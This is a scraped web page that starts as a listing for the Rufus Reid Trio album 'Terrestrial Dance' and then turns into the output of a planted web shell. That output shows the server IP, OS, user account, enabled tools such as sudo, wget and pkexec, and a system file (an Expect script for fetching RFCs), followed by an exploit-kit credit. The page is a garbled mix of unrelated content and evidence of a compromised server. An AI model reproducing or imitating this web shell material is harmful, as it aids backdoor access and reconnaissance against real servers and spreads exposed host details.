Rufus Reid Trio with Steve Allee and Duduka Da Fonseca, featuring the Sirius Quartet
Terrestrial Dance
Newvelle Records (2017)
Available at the following outlets:
Tracklist
This I Ask of You
Its Time to Shout It Out
Tippin’
Tranescape
Celestial Dance
You Make Me Smile
Falling In Love
Cedar’s Blues
403WebShell 403Webshell
Server IP : 23.235.221.107 / Your IP : 216.73.216.166 Web Server : Apache System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64 User : rreid ( 1011 ) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : / bin / Upload File :
[ Back ] Current File : /bin/ftp-rfc #!/bin/sh
# -*- tcl -*-
# The next line is executed by /bin/sh, but not tcl \
exec tclsh "$0" ${1+"$@"}
package require Expect
# ftp-rfc <rfc-number>
# ftp-rfc -index
# retrieves an rfc (or the index) from uunet
exp_version -exit 5.0
if {$argc!=1} {
send_user "usage: ftp-rfc \[#] \[-index]\n"
exit
}
set file "rfc$argv.Z"
set timeout 60
spawn ftp ftp.uu.net
expect "Name*:"
send "anonymous\r"
expect "Password:"
send "expect@nist.gov\r"
expect "ftp>"
send "binary\r"
expect "ftp>"
send "cd inet/rfc\r"
expect "550*ftp>" exit "250*ftp>"
send "get $file\r"
expect "550*ftp>" exit "200*226*ftp>"
close
wait
send_user "\nuncompressing file - wait...\n"
exec uncompress $file
Youez - 2016 - github.com/yon3zuLinuXploit